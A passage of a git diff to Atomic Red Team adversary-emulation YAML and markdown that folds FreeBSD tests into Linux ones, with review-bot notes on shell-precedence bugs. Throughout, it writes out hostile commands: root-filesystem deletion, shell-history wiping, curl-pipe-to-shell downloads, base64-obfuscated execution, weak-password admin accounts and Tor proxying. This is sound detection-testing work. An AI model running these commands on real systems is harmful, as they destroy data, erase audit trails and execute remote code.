rmuser + -y art ' - name: Reactivate a locked/expired account (Linux) @@ -81472,7 +81238,7 @@ command-and-control: stop-process -name "tor" | out-null name: powershell elevation_required: false - - name: Tor Proxy Usage - Debian/Ubuntu + - name: Tor Proxy Usage - Debian/Ubuntu/FreeBSD auto_generated_guid: 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 description: "This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications 
@@ -81487,12 +81253,15 @@ command-and-control: exit 1; fi ' - get_prereq_command: 'sudo apt-get -y install tor + get_prereq_command: "(which apt && sudo apt-get -y install tor) || (which + pkg && pkg install -y tor)\n" + executor: + command: '[ "$(uname)" = ''FreeBSD'' ] && sysrc tor_enable="YES" && service + tor start || sudo systemctl start tor ' - executor: - command: "sudo systemctl start tor \n" - cleanup_command: 'sudo systemctl stop tor + cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && service tor stop && sysrc + -x tor_enable || sudo systemctl stop tor ' name: sh @@ -81523,33 +81292,6 @@ command-and-control: ' name: sh - - name: Tor Proxy Usage - FreeBSD - auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a - description: "This test is designed to launch the tor proxy service, which is - what is utilized in the background by the Tor Browser and other applications - with add-ons in order to provide onion routing functionality.\nUpon successful - execution, the tor proxy service will be launched. \n" - supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: "Tor must be installed on the machine \n" - prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else - exit 1; fi - - ' - get_prereq_command: 'pkg install -y tor - - ' - executor: - command: | - sysrc tor_enable="YES" - service tor start - cleanup_command: | - service tor stop - sysrc -x tor_enable - name: sh - elevation_required: true T1001: technique: x_mitre_platforms: 
@@ -85453,25 +85195,6 @@ collection: supported_platforms: - linux - macos - input_arguments: - output_file: - description: Location to save downloaded discovery.bat file - type: path - default: "/tmp/T1074.001_discovery.log" - executor: - command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh - | bash -s > #{output_file} - - ' - name: bash - - name: Stage data from Discovery.sh (freebsd) - auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46 - description: 'Utilize curl to download discovery.sh and execute a basic information - gathering shell script - - ' - supported_platforms: - - linux input_arguments: output_file: description: Location to save downloaded discovery.bat file @@ -85479,18 +85202,24 @@ collection: default: "/tmp/T1074.001_discovery.log" dependency_executor_name: sh dependencies: - - description: 'Check if curl is installed. + - description: 'Check if curl is installed on the machine. ' - prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit - 0; fi; + prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed"; + else echo "curl is NOT installed"; exit 1; fi + + ' + get_prereq_command: 'which apt && apt update && apt install -y curl || which + pkg && pkg update && pkg install -y curl ' - get_prereq_command: "(which pkg && pkg install -y curl)\n" executor: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file} + ' + cleanup_command: 'rm #{output_file} + ' name: sh - name: Zip a Folder with PowerShell for Staging in Temp 
@@ -104315,29 +104044,8 @@ discovery: ' executor: - command: | - lastlog > #{output_file} - cat #{output_file} - cleanup_command: 'rm -f #{output_file} - - ' - name: sh - - name: Show if a user account has ever logged in remotely (freebsd) - auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35 - description: 'Show if a user account has ever logged in remotely - - ' - supported_platforms: - - linux - input_arguments: - output_file: - description: Path where captured results will be placed - type: path - default: "/tmp/T1087.001.txt" - executor: - command: | - lastlogin > #{output_file} - cat #{output_file} + command: "[ \"$(uname)\" = 'FreeBSD' ] && cmd=\"lastlogin\" || cmd=\"lastlog\" + \n$cmd > #{output_file}\ncat #{output_file}\n" cleanup_command: 'rm -f #{output_file} ' @@ -121807,26 +121515,11 @@ initial-access: name: bash elevation_required: true command: | - useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art - su art - whoami - exit - cleanup_command: "userdel -r art \n" - - name: Create local account (FreeBSD) - auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 - description: 'An adversary may wish to create an account with admin privileges - to work with. In this test we create a "art" user with the password art, switch - to art, execute whoami, exit and delete the art user. - - ' - supported_platforms: - - linux - executor: - name: sh - elevation_required: true - command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) - | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" - cleanup_command: 'rmuser -y art + password=$(openssl passwd -1 art) + ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) + su art -c "whoami; exit" + cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser + -y art ' - name: Reactivate a locked/expired account (Linux) 
diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index 8adb1462f..46687e4cf 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -4615,23 +4615,16 @@ defense-evasion: description: 'Clears bash history via rm ' + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" supported_platforms: - linux - macos executor: - command: 'rm ~/.bash_history - - ' - name: sh - - name: Clear sh history (rm) - auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100 - description: 'Clears sh history via rm - - ' - supported_platforms: - - linux - executor: - command: 'rm ~/.sh_history + command: 'rm #{history_path} ' name: sh @@ -4640,22 +4633,15 @@ defense-evasion: description: 'Clears bash history via echo ' + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" supported_platforms: - linux executor: - command: 'echo "" > ~/.bash_history - - ' - name: sh - - name: Clear sh history (echo) - auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96 - description: 'Clears sh history via echo - - ' - supported_platforms: - - linux - executor: - command: 'echo "" > ~/.sh_history + command: 'echo "" > #{history_path} ' name: sh @@ -4667,20 +4653,13 @@ defense-evasion: supported_platforms: - linux - macos + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" executor: - command: 'cat /dev/null > ~/.bash_history - - ' - name: sh - - name: Clear sh history (cat dev/null) - auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc - description: 'Clears sh history via cat /dev/null - - ' - supported_platforms: - - linux - executor: - command: 'cat /dev/null > ~/.sh_history + command: 'cat /dev/null > #{history_path} ' name: sh 
@@ -4692,20 +4671,13 @@ defense-evasion: supported_platforms: - linux - macos + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" executor: - command: 'ln -sf /dev/null ~/.bash_history - - ' - name: sh - - name: Clear sh history (ln dev/null) - auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd - description: 'Clears sh history via a symlink to /dev/null - - ' - supported_platforms: - - linux - executor: - command: 'ln -sf /dev/null ~/.sh_history + command: 'ln -sf /dev/null #{history_path} ' name: sh @@ -4716,20 +4688,13 @@ defense-evasion: ' supported_platforms: - linux + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" executor: - command: 'truncate -s0 ~/.bash_history - - ' - name: sh - - name: Clear sh history (truncate) - auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818 - description: 'Clears sh history via truncate - - ' - supported_platforms: - - linux - executor: - command: 'truncate -s0 ~/.sh_history + command: 'truncate -s0 #{history_path} ' name: sh @@ -4748,22 +4713,6 @@ defense-evasion: export HISTFILESIZE=0 history -c name: sh - - name: Clear history of a bunch of shells (freebsd) - auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0 - description: 'Clears the history of a bunch of different shell types by setting - the history size to zero - - ' - supported_platforms: - - linux - executor: - command: | - unset HISTFILE - unset histfile - export HISTFILESIZE=0 - export HISTSIZE=0 - history -c - name: sh - name: Clear and Disable Bash History Logging auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 description: 'Clears the history and disable bash history logging of the current 
@@ -4814,41 +4763,15 @@ defense-evasion: prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | - /usr/sbin/useradd testuser1 - echo -e 'pwd101!\npwd101!' | passwd testuser1 - (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass) + [ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1 + [ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1 + (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass) executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname ' - cleanup_command: 'userdel -f testuser1 - - ' - name: sh - - name: Disable sh History Logging with SSH -T (freebsd) - auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee - description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T - keeps the ssh client from catching a proper TTY, which is what usually gets - logged on lastlog - - ' - supported_platforms: - - linux - dependencies: - - description: 'Install sshpass and create user account used for excuting - - ' - prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass - >/dev/null)\n" - get_prereq_command: | - pw useradd testuser1 -g wheel -s /bin/sh - echo 'pwd101!' | pw mod user testuser1 -h 0 - (which pkg && pkg install -y sshpass) - executor: - command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname - - ' - cleanup_command: 'rmuser -y testuser1 + cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y testuser1 || userdel + -f testuser1 ' name: sh 
@@ -17875,23 +17798,10 @@ defense-evasion: supported_platforms: - linux executor: - command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null + command: '[ "$(uname)" = ''Linux'' ] && rm -rf / --no-preserve-root > /dev/null + 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null ' - name: bash - - name: Delete Filesystem - FreeBSD - auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608 - description: 'This test deletes the entire root filesystem of a FreeBSD system. - This technique was used by Amnesia IoT malware to avoid analysis. This test - is dangerous and destructive, do NOT use on production equipment. - - ' - supported_platforms: - - linux - executor: - command: | - chflags -R 0 / - rm -rf / > /dev/null 2> /dev/null name: sh T1158: technique: @@ -20358,26 +20268,11 @@ defense-evasion: name: bash elevation_required: true command: | - useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art - su art - whoami - exit - cleanup_command: "userdel -r art \n" - - name: Create local account (FreeBSD) - auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 - description: 'An adversary may wish to create an account with admin privileges - to work with. In this test we create a "art" user with the password art, switch - to art, execute whoami, exit and delete the art user. - - ' - supported_platforms: - - linux - executor: - name: sh - elevation_required: true - command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) - | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" - cleanup_command: 'rmuser -y art + password=$(openssl passwd -1 art) + ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) + su art -c "whoami; exit" + cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser + -y art ' - name: Reactivate a locked/expired account (Linux) 
@@ -32629,26 +32524,11 @@ privilege-escalation: name: bash elevation_required: true command: | - useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art - su art - whoami - exit - cleanup_command: "userdel -r art \n" - - name: Create local account (FreeBSD) - auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 - description: 'An adversary may wish to create an account with admin privileges - to work with. In this test we create a "art" user with the password art, switch - to art, execute whoami, exit and delete the art user. - - ' - supported_platforms: - - linux - executor: - name: sh - elevation_required: true - command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) - | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" - cleanup_command: 'rmuser -y art + password=$(openssl passwd -1 art) + ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) + su art -c "whoami; exit" + cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser + -y art ' - name: Reactivate a locked/expired account (Linux) 
@@ -36017,29 +35897,14 @@ execution: ' supported_platforms: - linux - executor: - name: sh - elevation_required: false - command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n - \"$ART\" |base64 -d |/bin/bash\nunset ART \n" - - name: Obfuscated command line scripts (freebsd) - auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062 - description: 'An adversary may pre-compute the base64 representations of the - terminal commands that they wish to execute in an attempt to avoid or frustrate - detection. The following commands base64 encodes the text string id, then - base64 decodes the string, then pipes it as a command to bash, which results - in the id command being executed. - - ' - supported_platforms: - - linux executor: name: sh elevation_required: false command: | - ART=$(echo -n "id" |b64encode -r -) + [ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d" + ART=$(echo -n "id" | $encodecmd) echo "\$ART=$ART" - echo -n "$ART" |b64decode -r |/bin/sh + echo -n "$ART" | $decodecmd |/bin/bash unset ART - name: Change login shell auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 
@@ -36065,42 +35930,12 @@ execution: name: bash elevation_required: true command: | - useradd -s /bin/bash art + [ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art cat /etc/passwd |grep ^art chsh -s /bin/sh art cat /etc/passwd |grep ^art - cleanup_command: 'userdel art - - ' - - name: Change login shell (freebsd) - auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c - description: "An adversary may want to use a different login shell. The chsh - command changes the user login shell. The following test, creates an art user - with a /bin/sh shell, changes the users shell to sh, then deletes the art - user. \n" - supported_platforms: - - linux - dependencies: - - description: 'chsh - change login shell, must be installed - - ' - prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit - 1"; exit 1; fi - - ' - get_prereq_command: 'echo "Automated installer not implemented yet, please - install chsh manually" - - ' - executor: - name: sh - elevation_required: true - command: | - pw useradd art -g wheel -s /bin/csh - cat /etc/passwd |grep ^art - chsh -s /bin/sh art - cat /etc/passwd |grep ^art - cleanup_command: 'rmuser -y art + cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y art || userdel + art ' - name: Environment variable scripts 
@@ -36113,25 +35948,6 @@ execution: ' supported_platforms: - linux - executor: - name: bash - elevation_required: false - command: | - export ART='echo "Atomic Red Team was here... T1059.004"' - echo $ART |/bin/bash - cleanup_command: 'unset ART - - ' - - name: Environment variable scripts (freebsd) - auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee - description: 'An adversary may place scripts in an environment variable because - they can''t or don''t wish to create script files on the host. The following - test, in a bash shell, exports the ART variable containing an echo command, - then pipes the variable to /bin/sh - - ' - supported_platforms: - - linux executor: name: sh elevation_required: false 
@@ -36162,59 +35978,24 @@ execution: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh dependency_executor_name: bash dependencies: - - description: 'Check if running on a Debian based machine. + - description: 'Check if curl is installed on the machine. ' - prereq_command: | - if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi - if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi - get_prereq_command: 'apt update && apt install -y curl + prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed"; + else echo "curl is NOT installed"; exit 1; fi ' - executor: - name: bash - elevation_required: false - command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url} - |bash\nls -la /tmp/art.txt \n" - cleanup_command: 'rm /tmp/art.txt - - ' - - name: Detecting pipe-to-shell (freebsd) - auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632 - description: 'An adversary may develop a useful utility or subvert the CI/CD - pipe line of a legitimate utility developer, who requires or suggests installing - their utility by piping a curl download directly into bash. Of-course this - is a very bad idea. The adversary may also take advantage of this BLIND install - method and selectively running extra commands in the install script for those - who DO pipe to bash and not for those who DO NOT. This test uses curl to download - the pipe-to-shell.sh script, the first time without piping it to bash and - the second piping it into bash which executes the echo command. 
- - ' - supported_platforms: - - linux - input_arguments: - remote_url: - description: url of remote payload - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh - dependency_executor_name: sh - dependencies: - - description: 'Check if running on a Debian based machine. - - ' - prereq_command: | - if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi - if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi - get_prereq_command: 'pkg update && pkg install -y curl + get_prereq_command: 'which apt && apt update && apt install -y curl || which + pkg && pkg update && pkg install -y curl ' executor: name: sh elevation_required: false - command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url} - |bash\nls -la /tmp/art.txt \n" - cleanup_command: "rm /tmp/art.txt \n" + command: "cd /tmp\ncurl -s #{remote_url} |bash\nls -la /tmp/art.txt \n" + cleanup_command: 'rm /tmp/art.txt + + ' - name: Current kernel information enumeration auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14 description: 'An adversary may want to enumerate the kernel information to tailor 
@@ -51646,26 +51427,11 @@ persistence: name: bash elevation_required: true command: | - useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art - su art - whoami - exit - cleanup_command: "userdel -r art \n" - - name: Create local account (FreeBSD) - auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 - description: 'An adversary may wish to create an account with admin privileges - to work with. In this test we create a "art" user with the password art, switch - to art, execute whoami, exit and delete the art user. - - ' - supported_platforms: - - linux - executor: - name: sh - elevation_required: true - command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) - | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" - cleanup_command: 'rmuser -y art + password=$(openssl passwd -1 art) + ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) + su art -c "whoami; exit" + cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser + -y art ' - name: Reactivate a locked/expired account (Linux) @@ -53579,7 +53345,7 @@ command-and-control: - 'Network Traffic: Network Connection Creation' identifier: T1090.003 atomic_tests: - - name: Tor Proxy Usage - Debian/Ubuntu + - name: Tor Proxy Usage - Debian/Ubuntu/FreeBSD auto_generated_guid: 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 description: "This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications 
@@ -53594,41 +53360,17 @@ command-and-control: exit 1; fi ' - get_prereq_command: 'sudo apt-get -y install tor - - ' + get_prereq_command: "(which apt && sudo apt-get -y install tor) || (which + pkg && pkg install -y tor)\n" executor: - command: "sudo systemctl start tor \n" - cleanup_command: 'sudo systemctl stop tor + command: '[ "$(uname)" = ''FreeBSD'' ] && sysrc tor_enable="YES" && service + tor start || sudo systemctl start tor ' - name: sh - elevation_required: true - - name: Tor Proxy Usage - FreeBSD - auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a - description: "This test is designed to launch the tor proxy service, which is - what is utilized in the background by the Tor Browser and other applications - with add-ons in order to provide onion routing functionality.\nUpon successful - execution, the tor proxy service will be launched. \n" - supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: "Tor must be installed on the machine \n" - prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else - exit 1; fi + cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && service tor stop && sysrc + -x tor_enable || sudo systemctl stop tor ' - get_prereq_command: 'pkg install -y tor - - ' - executor: - command: | - sysrc tor_enable="YES" - service tor start - cleanup_command: | - service tor stop - sysrc -x tor_enable name: sh elevation_required: true T1001: 
@@ -56239,25 +55981,6 @@ collection: supported_platforms: - linux - macos - input_arguments: - output_file: - description: Location to save downloaded discovery.bat file - type: path - default: "/tmp/T1074.001_discovery.log" - executor: - command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh - | bash -s > #{output_file} - - ' - name: bash - - name: Stage data from Discovery.sh (freebsd) - auto_generated_guid: 4fca7b49-379d-4493-8890-d6297750fa46 - description: 'Utilize curl to download discovery.sh and execute a basic information - gathering shell script - - ' - supported_platforms: - - linux input_arguments: output_file: description: Location to save downloaded discovery.bat file @@ -56265,18 +55988,24 @@ collection: default: "/tmp/T1074.001_discovery.log" dependency_executor_name: sh dependencies: - - description: 'Check if curl is installed. + - description: 'Check if curl is installed on the machine. ' - prereq_command: 'if [ ! -x "$(command -v curl)" ]; then exit 1; else exit - 0; fi; + prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed"; + else echo "curl is NOT installed"; exit 1; fi + + ' + get_prereq_command: 'which apt && apt update && apt install -y curl || which + pkg && pkg update && pkg install -y curl ' - get_prereq_command: "(which pkg && pkg install -y curl)\n" executor: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file} + ' + cleanup_command: 'rm #{output_file} + ' name: sh T1114.001: 
@@ -68728,29 +68457,8 @@ discovery: ' executor: - command: | - lastlog > #{output_file} - cat #{output_file} - cleanup_command: 'rm -f #{output_file} - - ' - name: sh - - name: Show if a user account has ever logged in remotely (freebsd) - auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35 - description: 'Show if a user account has ever logged in remotely - - ' - supported_platforms: - - linux - input_arguments: - output_file: - description: Path where captured results will be placed - type: path - default: "/tmp/T1087.001.txt" - executor: - command: | - lastlogin > #{output_file} - cat #{output_file} + command: "[ \"$(uname)\" = 'FreeBSD' ] && cmd=\"lastlogin\" || cmd=\"lastlog\" + \n$cmd > #{output_file}\ncat #{output_file}\n" cleanup_command: 'rm -f #{output_file} ' @@ -81693,26 +81401,11 @@ initial-access: name: bash elevation_required: true command: | - useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art - su art - whoami - exit - cleanup_command: "userdel -r art \n" - - name: Create local account (FreeBSD) - auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 - description: 'An adversary may wish to create an account with admin privileges - to work with. In this test we create a "art" user with the password art, switch - to art, execute whoami, exit and delete the art user. - - ' - supported_platforms: - - linux - executor: - name: sh - elevation_required: true - command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) - | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" - cleanup_command: 'rmuser -y art + password=$(openssl passwd -1 art) + ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) + su art -c "whoami; exit" + cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser + -y art ' - name: Reactivate a locked/expired account (Linux) 
diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml index 6e9efe78f..2488df738 100644 --- a/atomics/Indexes/macos-index.yaml +++ b/atomics/Indexes/macos-index.yaml @@ -4322,11 +4322,16 @@ defense-evasion: description: 'Clears bash history via rm ' + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" supported_platforms: - linux - macos executor: - command: 'rm ~/.bash_history + command: 'rm #{history_path} ' name: sh @@ -4338,8 +4343,13 @@ defense-evasion: supported_platforms: - linux - macos + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" executor: - command: 'cat /dev/null > ~/.bash_history + command: 'cat /dev/null > #{history_path} ' name: sh @@ -4351,8 +4361,13 @@ defense-evasion: supported_platforms: - linux - macos + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" executor: - command: 'ln -sf /dev/null ~/.bash_history + command: 'ln -sf /dev/null #{history_path} ' name: sh 
@@ -52543,12 +52558,28 @@ collection: description: Location to save downloaded discovery.bat file type: path default: "/tmp/T1074.001_discovery.log" - executor: - command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh - | bash -s > #{output_file} + dependency_executor_name: sh + dependencies: + - description: 'Check if curl is installed on the machine. ' - name: bash + prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed"; + else echo "curl is NOT installed"; exit 1; fi + + ' + get_prereq_command: 'which apt && apt update && apt install -y curl || which + pkg && pkg update && pkg install -y curl + + ' + executor: + command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh + | sh -s > #{output_file} + + ' + cleanup_command: 'rm #{output_file} + + ' + name: sh T1114.001: technique: x_mitre_platforms: diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md index 4f4790ab9..9c0f8dacc 100644 --- a/atomics/T1059.004/T1059.004.md +++ b/atomics/T1059.004/T1059.004.md 
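Review bot: The new `get_prereq_command` chains `which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl` without grouping; `&&` and `||` have equal precedence and associate left-to-right, so this parses as `((which apt && apt update && apt install) || which pkg) && pkg update && pkg install`, and after a successful apt install it still runs `pkg update`, which fails on Linux and makes the prerequisite step report failure even though curl is now present. Group each package-manager path: `(which apt && apt update && apt install -y curl) || (which pkg && pkg update && pkg install -y curl)`. The identical ungrouped chain is copied into the T1059.004 and T1074.001 markdown in this commit and needs the same fix. Separately, `cleanup_command: 'rm #{output_file}'` should be `rm -f #{output_file}` so cleanup does not error when the attack command never produced the file.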
@@ -26,21 +26,13 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter - [Atomic Test #9 - Obfuscated command line scripts](#atomic-test-9---obfuscated-command-line-scripts) -- [Atomic Test #10 - Obfuscated command line scripts (freebsd)](#atomic-test-10---obfuscated-command-line-scripts-freebsd) +- [Atomic Test #10 - Change login shell](#atomic-test-10---change-login-shell) -- [Atomic Test #11 - Change login shell](#atomic-test-11---change-login-shell) +- [Atomic Test #11 - Environment variable scripts](#atomic-test-11---environment-variable-scripts) -- [Atomic Test #12 - Change login shell (freebsd)](#atomic-test-12---change-login-shell-freebsd) +- [Atomic Test #12 - Detecting pipe-to-shell](#atomic-test-12---detecting-pipe-to-shell) -- [Atomic Test #13 - Environment variable scripts](#atomic-test-13---environment-variable-scripts) - -- [Atomic Test #14 - Environment variable scripts (freebsd)](#atomic-test-14---environment-variable-scripts-freebsd) - -- [Atomic Test #15 - Detecting pipe-to-shell](#atomic-test-15---detecting-pipe-to-shell) - -- [Atomic Test #16 - Detecting pipe-to-shell (freebsd)](#atomic-test-16---detecting-pipe-to-shell-freebsd) - -- [Atomic Test #17 - Current kernel information enumeration](#atomic-test-17---current-kernel-information-enumeration) +- [Atomic Test #13 - Current kernel information enumeration](#atomic-test-13---current-kernel-information-enumeration)
@@ -360,9 +352,10 @@ An adversary may pre-compute the base64 representations of the terminal commands ```sh -ART=$(echo -n "id" |base64 -w 0) +[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d" +ART=$(echo -n "id" | $encodecmd) echo "\$ART=$ART" -echo -n "$ART" |base64 -d |/bin/bash +echo -n "$ART" | $decodecmd |/bin/bash unset ART ``` @@ -374,38 +367,7 @@ unset ART
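Review bot: The platform-selection line `[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"` has the wrong precedence: the shell evaluates `&&`/`||` left-to-right with equal binding, so on FreeBSD the trailing `&& decodecmd="base64 -d"` still runs and overwrites the `b64decode -r` value assigned a moment earlier, leaving the encode and decode halves mismatched. Replace it with an explicit conditional: `if [ "$(uname)" = 'FreeBSD' ]; then encodecmd="b64encode -r -"; decodecmd="b64decode -r"; else encodecmd="base64 -w 0"; decodecmd="base64 -d"; fi`. The decoded command is also still piped into `/bin/bash`, which is not part of the FreeBSD base system; `/bin/sh` exists on both platforms and runs `id` identically, so `| /bin/sh` would match the cross-platform intent of the change.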

-## Atomic Test #10 - Obfuscated command line scripts (freebsd) -An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed. - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 5dc1d9dd-f396-4420-b985-32b1c4f79062 - - - - - - -#### Attack Commands: Run with `sh`! - - -```sh -ART=$(echo -n "id" |b64encode -r -) -echo "\$ART=$ART" -echo -n "$ART" |b64decode -r |/bin/sh -unset ART -``` - - - - - - -
-
